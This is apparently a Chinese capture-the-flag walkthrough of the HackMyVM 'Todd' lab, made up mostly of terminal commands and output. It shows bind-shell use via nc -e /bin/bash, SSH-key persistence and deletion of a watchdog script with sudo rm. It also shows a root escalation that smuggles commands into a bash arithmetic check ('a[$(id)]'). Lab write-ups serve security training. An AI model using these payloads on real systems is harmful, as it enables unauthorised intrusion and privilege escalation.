1 2 3 4 5 6 7 8 9 10 ┌──(root㉿kali)-[~] └─ Interface: eth2, type : EN10MB, MAC: 00:0c:29:26:ba:7d, IPv4: 192.168.56.121 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.56.1 0a:00:27:00:00:15 (Unknown: locally administered) 192.168.56.100 08:00:27:86:23:49 PCS Systemtechnik GmbH 192.168.56.120 08:00:27:28:80:f3 PCS Systemtechnik GmbH 3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 3 responded
扫端口
nc连7066
1 2 3 4 ┌──(root㉿kali)-[~] └─ tac /home/todd/user.txtTodd{eb930xxxxxxxxxxxxxxxxxxx
提权
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 todd@todd:/root$ sudo -l sudo -l Matching Defaults entries for todd on todd: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User todd may run the following commands on todd: (ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh (ALL : ALL) NOPASSWD: /usr/bin/rm (ALL : ALL) NOPASSWD: /usr/sbin/reboot todd@todd:/root$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/bin/umount /usr/bin/chfn /usr/bin/mount /usr/bin/newgrp /usr/bin/passwd /usr/bin/gpasswd /usr/bin/sudo /usr/bin/su /usr/bin/chsh todd@todd:/root$ cat /srv/guess_and_check.sh cat /srv/guess_and_check.shcat << EOF . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, HackMyVM EOF a=$((RANDOM%1000 )) echo "Please Input [$a ]" echo "[+] Check this script used by human." echo "[+] Please Input Correct Number:" read -p ">>>" input_number[[ $input_number -ne "$a " ]] && exit 1 sleep 0.2true_file="/tmp/$((RANDOM%1000) )" sleep 1false_file="/tmp/$((RANDOM%1000) )" [[ -f "$true_file " ]] && [[ ! -f "$false_file " ]] && cat /root/.cred || exit 2 todd@todd:/root$
nc会掉
写入ssh公钥连接
1 2 3 4 5 6 7 8 9 10 11 todd@todd:~/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDC2Yc2foJ3bQhaF4yQSmoBLh39DLw7ayAkIh09FEtzDQ5UcA3ayxDKGb1gZh5c3jtjvFaVHxsVkLf9rXDoYi2livnzfUAir5KCkMs/rHIgwRjEw9flARndmWYQDtkpBcHyuNvyYUXkrVev0jdncYhfz7vBG8wakeCLd3Ez10XEf7kJI5g2gCjuDmQm68MuD27Am0lAzMvkjd8t8ENvjl11p1KFWs1PplBwDWL8jt7HrRMQPhJ2rmDNeY7ZVzTwuyGtC5qeQ+1175ly+PUL/3Nydrw+RjyAXeI/V9Bt5XFYmVP10z3Obfps/OyqjWn+kslgg7M0klz7qw+uqkuohk5dIfSK+N/w+x4kVzx5KEE4uhGOGnskrR5uoc+ZknoZ9DBYPYTdZPmIpHXXqMjUlTBbsKbpseDhx+ODvGwBlVTgMMaF/n9Q+0ANR1I7JbK9o15gyJ8OfK/g9yqbqRfcKF5PIE8j1rW0OVN3Jj1SSlMPCeZJ7I6N8SrTwEOi7LfaFVlAHSBgU3khmdEMc2562p9zNhuOpuSn4SeIw8djFycih2QGozsQYS6p3QVRTuw79Oh/Gvou3BSkxIIFLV75v+MB40hg4iXBxLt5dveUJ+aIbBo9mnkcbb0Ha+PoJB5sChsFh93PH53rEvGlP+8S2+5pO9Mvml+YOml4JSkomUOJYw== root@kali" > authorized_keys <Mvml+YOml4JSkomUOJYw== root@kali" > authorized_keys todd@todd:~/.ssh$ ls -al ls -al total 12 drwxr-xr-x 2 todd todd 4096 Apr 11 02:33 . drwxr-xr-x 3 todd todd 4096 Apr 11 02:31 .. -rw-r--r-- 1 todd todd 735 Apr 11 02:33 authorized_keys todd@todd:~/.ssh$ cat au cat authorized_keys ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDC2Yc2foJ3bQhaF4yQSmoBLh39DLw7ayAkIh09FEtzDQ5UcA3ayxDKGb1gZh5c3jtjvFaVHxsVkLf9rXDoYi2livnzfUAir5KCkMs/rHIgwRjEw9flARndmWYQDtkpBcHyuNvyYUXkrVev0jdncYhfz7vBG8wakeCLd3Ez10XEf7kJI5g2gCjuDmQm68MuD27Am0lAzMvkjd8t8ENvjl11p1KFWs1PplBwDWL8jt7HrRMQPhJ2rmDNeY7ZVzTwuyGtC5qeQ+1175ly+PUL/3Nydrw+RjyAXeI/V9Bt5XFYmVP10z3Obfps/OyqjWn+kslgg7M0klz7qw+uqkuohk5dIfSK+N/w+x4kVzx5KEE4uhGOGnskrR5uoc+ZknoZ9DBYPYTdZPmIpHXXqMjUlTBbsKbpseDhx+ODvGwBlVTgMMaF/n9Q+0ANR1I7JbK9o15gyJ8OfK/g9yqbqRfcKF5PIE8j1rW0OVN3Jj1SSlMPCeZJ7I6N8SrTwEOi7LfaFVlAHSBgU3khmdEMc2562p9zNhuOpuSn4SeIw8djFycih2QGozsQYS6p3QVRTuw79Oh/Gvou3BSkxIIFLV75v+MB40hg4iXBxLt5dveUJ+aIbBo9mnkcbb0Ha+PoJB5sChsFh93PH53rEvGlP+8S2+5pO9Mvml+YOml4JSkomUOJYw== root@kali
1 2 3 4 5 6 7 8 9 10 11 12 ┌──(root㉿kali)-[~/.ssh] └─ Linux todd 4.19.0-12-amd64 The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Fri Apr 11 02:34:10 2025 from 192.168.56.121 $
发现还是会掉 原来是踢用户
本来想着vshell上马来 发现靶机没有curl,没辙
www目录下有作者留下来的工具
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 $ cd /var/www/html/tools $ lks -sh: 2: lks: not found $ ls fscan les.sh linpeas.sh pspy64 $ ./pspy -sh: 4: ./pspy: not found $ ./pspy64 pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d ██▓███ ██████ ██▓███ ▓██ ██▓ ▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒ ▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░ ▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░ ▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░ ▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒ ░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░ ░░ ░ ░ ░ ░░ ▒ ▒ ░░ ░ ░ ░ ░ ░ Config: Printing events (colored=true ): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive) Draining file system events due to startup... done 2025/04/11 02:56:17 CMD: UID=1000 PID=3711 | ./pspy64 2025/04/11 02:56:17 CMD: UID=1000 PID=3697 | -sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3696 | sshd: todd@pts/0 2025/04/11 02:56:17 CMD: UID=1000 PID=3688 | (sd-pam) 2025/04/11 02:56:17 CMD: UID=1000 PID=3687 | /lib/systemd/systemd --user 2025/04/11 02:56:17 CMD: UID=0 PID=3684 | sshd: todd [priv] 2025/04/11 02:56:17 CMD: UID=1000 PID=3681 | nc -e /opt/fake_ssh -lp 30996 2025/04/11 02:56:17 CMD: UID=0 PID=3680 | sudo -u todd nc -e /opt/fake_ssh -lp 30996 2025/04/11 02:56:17 CMD: UID=0 PID=3679 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3678 | nc -e /opt/fake_ssh -lp 14306 2025/04/11 02:56:17 CMD: UID=0 PID=3677 | sudo -u todd nc -e /opt/fake_ssh -lp 14306 2025/04/11 02:56:17 CMD: UID=0 PID=3675 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3674 | nc -e /opt/fake_ssh -lp 26334 2025/04/11 02:56:17 CMD: UID=0 PID=3673 | sudo -u todd nc -e /opt/fake_ssh -lp 26334 2025/04/11 02:56:17 CMD: UID=0 PID=3671 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3670 | nc -e /opt/fake_ssh -lp 6141 2025/04/11 02:56:17 CMD: UID=0 PID=3668 | sudo -u todd nc -e /opt/fake_ssh -lp 6141 2025/04/11 02:56:17 CMD: UID=0 PID=3666 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3665 | nc -e /opt/fake_ssh -lp 20070 2025/04/11 02:56:17 CMD: UID=0 PID=3664 | sudo -u todd nc -e /opt/fake_ssh -lp 20070 2025/04/11 02:56:17 CMD: UID=0 PID=3662 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3661 | nc -e /opt/fake_ssh -lp 14452 2025/04/11 02:56:17 CMD: UID=0 PID=3660 | sudo -u todd nc -e /opt/fake_ssh -lp 14452 2025/04/11 02:56:17 CMD: UID=0 PID=3658 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3657 | nc -e /opt/fake_ssh -lp 1428 2025/04/11 02:56:17 CMD: UID=0 PID=3656 | sudo -u todd nc -e /opt/fake_ssh -lp 1428 2025/04/11 02:56:17 CMD: UID=0 PID=3654 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3653 | nc -e /opt/fake_ssh -lp 6779 2025/04/11 02:56:17 CMD: UID=0 PID=3652 | sudo -u todd nc -e /opt/fake_ssh -lp 6779 2025/04/11 02:56:17 CMD: UID=0 PID=3650 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3649 | nc -e /opt/fake_ssh -lp 6773 2025/04/11 02:56:17 CMD: UID=0 PID=3648 | sudo -u todd nc -e /opt/fake_ssh -lp 6773 2025/04/11 02:56:17 CMD: UID=0 PID=3646 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=1000 PID=3645 | nc -e /bin/bash -lp 7066 2025/04/11 02:56:17 CMD: UID=1000 PID=3644 | nc -e /opt/fake_ssh -lp 11852 2025/04/11 02:56:17 CMD: UID=0 PID=3642 | sudo -u todd nc -e /bin/bash -lp 7066 2025/04/11 02:56:17 CMD: UID=0 PID=3641 | sudo -u todd nc -e /opt/fake_ssh -lp 11852 2025/04/11 02:56:17 CMD: UID=0 PID=3639 | /bin/bash /opt/create_nc.sh 2025/04/11 02:56:17 CMD: UID=0 PID=3638 | /bin/bash /opt/create_nc2.sh 2025/04/11 02:56:17 CMD: UID=0 PID=3429 | 2025/04/11 02:56:17 CMD: UID=0 PID=3277 | 2025/04/11 02:56:17 CMD: UID=0 PID=3257 | 2025/04/11 02:56:17 CMD: UID=0 PID=2998 | 2025/04/11 02:56:17 CMD: UID=0 PID=2505 | 2025/04/11 02:56:17 CMD: UID=0 PID=2026 | 2025/04/11 02:56:17 CMD: UID=0 PID=1569 | 2025/04/11 02:56:17 CMD: UID=33 PID=395 | /usr/sbin/apache2 -k start 2025/04/11 02:56:17 CMD: UID=33 PID=394 | /usr/sbin/apache2 -k start 2025/04/11 02:56:17 CMD: UID=0 PID=392 | /usr/sbin/apache2 -k start 2025/04/11 02:56:17 CMD: UID=0 PID=377 | /usr/sbin/sshd -D 2025/04/11 02:56:17 CMD: UID=0 PID=368 | /sbin/agetty -o -p -- \u --noclear tty1 linux 2025/04/11 02:56:17 CMD: UID=0 PID=337 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 2025/04/11 02:56:17 CMD: UID=0 PID=317 | /usr/sbin/cron -f 2025/04/11 02:56:17 CMD: UID=0 PID=313 | /lib/systemd/systemd-logind 2025/04/11 02:56:17 CMD: UID=0 PID=308 | /usr/sbin/rsyslogd -n -iNONE 2025/04/11 02:56:17 CMD: UID=104 PID=307 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 2025/04/11 02:56:17 CMD: UID=0 PID=297 | 2025/04/11 02:56:17 CMD: UID=0 PID=296 | 2025/04/11 02:56:17 CMD: UID=101 PID=280 | /lib/systemd/systemd-timesyncd 2025/04/11 02:56:17 CMD: UID=0 PID=237 | /lib/systemd/systemd-udevd 2025/04/11 02:56:17 CMD: UID=0 PID=215 | /lib/systemd/systemd-journald 2025/04/11 02:56:17 CMD: UID=0 PID=187 | 2025/04/11 02:56:17 CMD: UID=0 PID=186 | 2025/04/11 02:56:17 CMD: UID=0 PID=184 | 2025/04/11 02:56:17 CMD: UID=0 PID=153 | 2025/04/11 02:56:17 CMD: UID=0 PID=112 | 2025/04/11 02:56:17 CMD: UID=0 PID=111 | 2025/04/11 02:56:17 CMD: UID=0 PID=109 | 2025/04/11 02:56:17 CMD: UID=0 PID=108 | 2025/04/11 02:56:17 CMD: UID=0 PID=106 | 2025/04/11 02:56:17 CMD: UID=0 PID=105 | 2025/04/11 02:56:17 CMD: UID=0 PID=103 | 2025/04/11 02:56:17 CMD: UID=0 PID=102 | 2025/04/11 02:56:17 CMD: UID=0 PID=59 | 2025/04/11 02:56:17 CMD: UID=0 PID=49 | 2025/04/11 02:56:17 CMD: UID=0 PID=48 | 2025/04/11 02:56:17 CMD: UID=0 PID=30 | 2025/04/11 02:56:17 CMD: UID=0 PID=29 | 2025/04/11 02:56:17 CMD: UID=0 PID=28 | 2025/04/11 02:56:17 CMD: UID=0 PID=27 | 2025/04/11 02:56:17 CMD: UID=0 PID=26 | 2025/04/11 02:56:17 CMD: UID=0 PID=25 | 2025/04/11 02:56:17 CMD: UID=0 PID=24 | 2025/04/11 02:56:17 CMD: UID=0 PID=23 | 2025/04/11 02:56:17 CMD: UID=0 PID=22 | 2025/04/11 02:56:17 CMD: UID=0 PID=21 | 2025/04/11 02:56:17 CMD: UID=0 PID=20 | 2025/04/11 02:56:17 CMD: UID=0 PID=19 | 2025/04/11 02:56:17 CMD: UID=0 PID=18 | 2025/04/11 02:56:17 CMD: UID=0 PID=17 | 2025/04/11 02:56:17 CMD: UID=0 PID=16 | 2025/04/11 02:56:17 CMD: UID=0 PID=15 | 2025/04/11 02:56:17 CMD: UID=0 PID=14 | 2025/04/11 02:56:17 CMD: UID=0 PID=12 | 2025/04/11 02:56:17 CMD: UID=0 PID=11 | 2025/04/11 02:56:17 CMD: UID=0 PID=10 | 2025/04/11 02:56:17 CMD: UID=0 PID=9 | 2025/04/11 02:56:17 CMD: UID=0 PID=8 | 2025/04/11 02:56:17 CMD: UID=0 PID=6 | 2025/04/11 02:56:17 CMD: UID=0 PID=4 | 2025/04/11 02:56:17 CMD: UID=0 PID=3 | 2025/04/11 02:56:17 CMD: UID=0 PID=2 | 2025/04/11 02:56:17 CMD: UID=0 PID=1 | /sbin/init 2025/04/11 02:56:18 CMD: UID=0 PID=3719 | (bash) 2025/04/11 02:56:20 CMD: UID=0 PID=3720 | (bash) 2025/04/11 02:56:21 CMD: UID=0 PID=3721 | /sbin/init 2025/04/11 02:56:22 CMD: UID=0 PID=3722 | /sbin/init 2025/04/11 02:56:23 CMD: UID=0 PID=3723 | /sbin/init 2025/04/11 02:56:25 CMD: UID=0 PID=3724 | (bash) 2025/04/11 02:56:26 CMD: UID=0 PID=3725 | /sbin/init 2025/04/11 02:56:27 CMD: UID=0 PID=3726 | /sbin/init 2025/04/11 02:56:28 CMD: UID=0 PID=3727 | (bash) 2025/04/11 02:56:30 CMD: UID=0 PID=3728 | /sbin/init 2025/04/11 02:56:31 CMD: UID=0 PID=3729 | /sbin/init 2025/04/11 02:56:32 CMD: UID=0 PID=3730 | /sbin/init 2025/04/11 02:56:33 CMD: UID=0 PID=3731 | /sbin/init 2025/04/11 02:56:35 CMD: UID=0 PID=3732 | (bash) 2025/04/11 02:56:36 CMD: UID=0 PID=3733 | (bash) 2025/04/11 02:56:37 CMD: UID=0 PID=3734 | (bash) 2025/04/11 02:56:38 CMD: UID=0 PID=3735 | (bash) 2025/04/11 02:56:40 CMD: UID=0 PID=3736 | (bash) 2025/04/11 02:56:41 CMD: UID=0 PID=3737 | /sbin/init 2025/04/11 02:56:42 CMD: UID=0 PID=3738 | /sbin/init 2025/04/11 02:56:43 CMD: UID=0 PID=3739 | (bash) 2025/04/11 02:56:45 CMD: UID=0 PID=3740 | /sbin/init 2025/04/11 02:56:46 CMD: UID=0 PID=3741 | (bash) 2025/04/11 02:56:47 CMD: UID=0 PID=3742 | /sbin/init 2025/04/11 02:56:48 CMD: UID=0 PID=3743 | (bash) 2025/04/11 02:56:50 CMD: UID=0 PID=3744 | /sbin/init 2025/04/11 02:56:51 CMD: UID=0 PID=3745 | /sbin/init 2025/04/11 02:56:52 CMD: UID=0 PID=3746 | (bash) 2025/04/11 02:56:53 CMD: UID=0 PID=3747 | (bash) 2025/04/11 02:56:55 CMD: UID=0 PID=3748 | /sbin/init 2025/04/11 02:56:56 CMD: UID=0 PID=3749 | /sbin/init 2025/04/11 02:56:57 CMD: UID=0 PID=3750 | (bash) 2025/04/11 02:56:58 CMD: UID=0 PID=3751 | (bash) 2025/04/11 02:57:00 CMD: UID=0 PID=3752 | /sbin/init 2025/04/11 02:57:01 CMD: UID=0 PID=3753 | (bash) 2025/04/11 02:57:02 CMD: UID=0 PID=3754 | (bash) 2025/04/11 02:57:03 CMD: UID=0 PID=3756 | (bash) 2025/04/11 02:57:05 CMD: UID=0 PID=3757 | /sbin/init 2025/04/11 02:57:06 CMD: UID=0 PID=3758 | (bash) 2025/04/11 02:57:07 CMD: UID=0 PID=3759 | /sbin/init 2025/04/11 02:57:08 CMD: UID=0 PID=3760 | /sbin/init 2025/04/11 02:57:10 CMD: UID=0 PID=3761 | (bash) 2025/04/11 02:57:11 CMD: UID=0 PID=3762 | (bash) 2025/04/11 02:57:12 CMD: UID=0 PID=3763 | /sbin/init 2025/04/11 02:57:13 CMD: UID=0 PID=3764 | /sbin/init 2025/04/11 02:57:15 CMD: UID=0 PID=3765 | /sbin/init 2025/04/11 02:57:16 CMD: UID=0 PID=3766 | (bash) 2025/04/11 02:57:17 CMD: UID=0 PID=3767 | /sbin/init 2025/04/11 02:57:18 CMD: UID=0 PID=3768 | /sbin/init 2025/04/11 02:57:20 CMD: UID=0 PID=3769 | /sbin/init 2025/04/11 02:57:21 CMD: UID=0 PID=3770 | /sbin/init 2025/04/11 02:57:22 CMD: UID=0 PID=3771 | /sbin/init 2025/04/11 02:57:23 CMD: UID=0 PID=3772 | /sbin/init 2025/04/11 02:57:25 CMD: UID=0 PID=3773 | (bash) 2025/04/11 02:57:26 CMD: UID=0 PID=3774 | /sbin/init 2025/04/11 02:57:26 CMD: UID=0 PID=3775 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3 2025/04/11 02:57:26 CMD: UID=0 PID=3776 | /bin/sh /sbin/dhclient-script 2025/04/11 02:57:26 CMD: UID=0 PID=3777 | /bin/sh /sbin/dhclient-script 2025/04/11 02:57:26 CMD: UID=0 PID=3778 | /bin/sh /sbin/dhclient-script 2025/04/11 02:57:27 CMD: UID=0 PID=3779 | /sbin/init 2025/04/11 02:57:28 CMD: UID=0 PID=3780 | (bash) 2025/04/11 02:57:30 CMD: UID=0 PID=3781 | (bash) 2025/04/11 02:57:31 CMD: UID=0 PID=3782 | /sbin/init 2025/04/11 02:57:32 CMD: UID=0 PID=3783 | /sbin/init 2025/04/11 02:57:33 CMD: UID=0 PID=3784 | /sbin/init 2025/04/11 02:57:35 CMD: UID=0 PID=3785 | /sbin/init 2025/04/11 02:57:36 CMD: UID=0 PID=3786 | /sbin/init 2025/04/11 02:57:37 CMD: UID=0 PID=3787 | /sbin/init 2025/04/11 02:57:38 CMD: UID=0 PID=3788 | (bash) 2025/04/11 02:57:40 CMD: UID=0 PID=3789 | (bash) 2025/04/11 02:57:41 CMD: UID=0 PID=3790 | (bash) 2025/04/11 02:57:42 CMD: UID=0 PID=3791 | /sbin/init 2025/04/11 02:57:43 CMD: UID=0 PID=3792 | (bash) 2025/04/11 02:57:45 CMD: UID=0 PID=3793 | /sbin/init 2025/04/11 02:57:46 CMD: UID=0 PID=3794 | /sbin/init 2025/04/11 02:57:47 CMD: UID=0 PID=3795 | /sbin/init 2025/04/11 02:57:48 CMD: UID=0 PID=3796 | (bash) 2025/04/11 02:57:50 CMD: UID=0 PID=3797 | /sbin/init 2025/04/11 02:57:51 CMD: UID=0 PID=3798 | /sbin/init 2025/04/11 02:57:52 CMD: UID=0 PID=3799 | /sbin/init 2025/04/11 02:57:53 CMD: UID=0 PID=3800 | /sbin/init 2025/04/11 02:57:55 CMD: UID=0 PID=3801 | /sbin/init 2025/04/11 02:57:56 CMD: UID=0 PID=3802 | (bash) 2025/04/11 02:57:57 CMD: UID=0 PID=3803 | /sbin/init 2025/04/11 02:57:58 CMD: UID=0 PID=3804 | (bash) 2025/04/11 02:58:00 CMD: UID=0 PID=3805 | /sbin/init 2025/04/11 02:58:01 CMD: UID=0 PID=3806 | /sbin/init 2025/04/11 02:58:01 CMD: UID=0 PID=3809 | /usr/sbin/cron -f 2025/04/11 02:58:01 CMD: UID=0 PID=3808 | /usr/sbin/cron -f 2025/04/11 02:58:01 CMD: UID=0 PID=3807 | /usr/sbin/cron -f 2025/04/11 02:58:01 CMD: UID=0 PID=3810 | /usr/sbin/CRON -f 2025/04/11 02:58:01 CMD: UID=0 PID=3811 | /usr/sbin/CRON -f 2025/04/11 02:58:01 CMD: UID=0 PID=3812 | /usr/sbin/CRON -f 2025/04/11 02:58:01 CMD: UID=0 PID=3813 | /bin/sh -c /bin/bash /opt/kill_todd.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3814 | /bin/sh -c /bin/bash /opt/create_nc.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3815 | /bin/sh -c /bin/bash /opt/create_nc2.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3816 | /bin/bash /opt/kill_todd.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3817 | /bin/bash /opt/create_nc.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3818 | /bin/bash /opt/create_nc2.sh 2025/04/11 02:58:01 CMD: UID=0 PID=3819 | /bin/bash /opt/create_nc.sh Connection to 192.168.56.120 closed by remote host. Connection to 192.168.56.120 closed.
发现在ssh结束的时候执行了kill_todd.sh,那么结合sudo rm直接删掉
1 2 3 4 5 6 7 8 9 $ sudo -l Matching Defaults entries for todd on todd: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User todd may run the following commands on todd: (ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh (ALL : ALL) NOPASSWD: /usr/bin/rm (ALL : ALL) NOPASSWD: /usr/sbin/reboot $ sudo /usr/bin/rm /opt/kill_todd.sh
那么仔细看这个脚本
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 $ cat /srv/guess_and_check.sh cat << EOF . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, HackMyVM EOF a=$((RANDOM%1000 )) echo "Please Input [$a ]" echo "[+] Check this script used by human." echo "[+] Please Input Correct Number:" read -p ">>>" input_number[[ $input_number -ne "$a " ]] && exit 1 sleep 0.2true_file="/tmp/$((RANDOM%1000) )" sleep 1false_file="/tmp/$((RANDOM%1000) )" [[ -f "$true_file " ]] && [[ ! -f "$false_file " ]] && cat /root/.cred || exit 2 $
生成一个随机数
a=$((RANDOM%1000)):生成一个 0 到 999 之间的随机数,并将其赋值给变量 a。
提示用户输入
echo "Please Input [$a]":将生成的随机数显示给用户。read -p ">>>" input_number:提示用户输入一个数字。
检查用户输入
[[ $input_number -ne "$a" ]] && exit 1:如果用户输入的数字不等于生成的随机数 a,脚本会以状态码 1 退出。
生成更多随机文件
true_file="/tmp/$((RANDOM%1000))" 和 false_file="/tmp/$((RANDOM%1000))":脚本生成两个位于 /tmp 目录下的随机文件路径。
文件存在性检查
[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]]:如果 true_file 指定的位置存在文件,并且 false_file 指定的位置没有文件,脚本会继续执行。
显示凭证文件内容
cat /root/.cred:如果上述条件成立(即 true_file 存在而 false_file 不存在),脚本将显示 /root/.cred 文件的内容,假设该文件包含敏感信息。|| exit 2:如果条件不成立,脚本将以状态码 2 退出。
法一 由于是和$a比较 那么可以构造报错
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 $ bash /srv/guess_and_check.sh . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, HackMyVM Please Input [551] [+] Check this script used by human. [+] Please Input Correct Number: >>>a[$(id )] /srv/guess_and_check.sh: line 35: uid=1000(todd) gid=1000(todd) groups =1000(todd): syntax error in expression (error token is "(todd) gid=1000(todd) groups=1000(todd)" ) $
相当于一个提前解析
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 todd@todd:~$ sudo /bin/bash /srv/guess_and_check.sh . ** * *. ,* *, , ,* ., *, / * ,* *, /. .*. * ** ,* ,* ** *. ** **. ,* ** *, ,* * ** *, .* *. ** ** ,*, ** *, HackMyVM Please Input [443] [+] Check this script used by human. [+] Please Input Correct Number: >>>a[(`bash >&2`)] root@todd:/home/todd Todd{389c990xxxxxxxxxxxxxxxxxx root@todd:/home/todd
由于管道1被当前程序占用 所以我们开一个其他管道
法二 由于是在tmp中判断a文件存在b文件不存在
那么瞎猫碰上死耗子 有1/4的可能性能成功
生成1-500的文件
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 todd@todd:/tmp$ ls 1 120 142 164 186 207 229 250 272 294 315 337 359 380 401 423 445 467 489 6 80 10 121 143 165 187 208 23 251 273 295 316 338 36 381 402 424 446 468 49 60 81 100 122 144 166 188 209 230 252 274 296 317 339 360 382 403 425 447 469 490 61 82 101 123 145 167 189 21 231 253 275 297 318 34 361 383 404 426 448 47 491 62 83 102 124 146 168 19 210 232 254 276 298 319 340 362 384 405 427 449 470 492 63 84 103 125 147 169 190 211 233 255 277 299 32 341 363 385 406 428 45 471 493 637fb9a5tcp 85 104 126 148 17 191 212 234 256 278 3 320 342 364 386 407 429 450 472 494 64 86 105 127 149 170 192 213 235 257 279 30 321 343 365 387 408 43 451 473 495 65 87 106 128 15 171 193 214 236 258 28 300 322 344 366 388 409 430 452 474 496 66 88 107 129 150 172 194 215 237 259 280 301 323 345 367 389 41 431 453 475 497 67 89 108 13 151 173 195 216 238 26 281 302 324 346 368 39 410 432 454 476 498 68 9 109 130 152 174 196 217 239 260 282 303 325 347 369 390 411 433 455 477 499 69 90 11 131 153 175 197 218 24 261 283 304 326 348 37 391 412 434 456 478 5 7 91 110 132 154 176 198 219 240 262 284 305 327 349 370 392 413 435 457 479 50 70 92 111 133 155 177 199 22 241 263 285 306 328 35 371 393 414 436 458 48 500 71 93 112 134 156 178 2 220 242 264 286 307 329 350 372 394 415 437 459 480 51 72 94 113 135 157 179 20 221 243 265 287 308 33 351 373 395 416 438 46 481 52 73 95 114 136 158 18 200 222 244 266 288 309 330 352 374 396 417 439 460 482 53 74 96 115 137 159 180 201 223 245 267 289 31 331 353 375 397 418 44 461 483 54 75 97 116 138 16 181 202 224 246 268 29 310 332 354 376 398 419 440 462 484 55 76 98 117 139 160 182 203 225 247 269 290 311 333 355 377 399 42 441 463 485 56 77 99 118 14 161 183 204 226 248 27 291 312 334 356 378 4 420 442 464 486 57 78 systemd-private-2b9bcb31d26f4754b0da191ec419ef1b-apache2.service-WuonYb 119 140 162 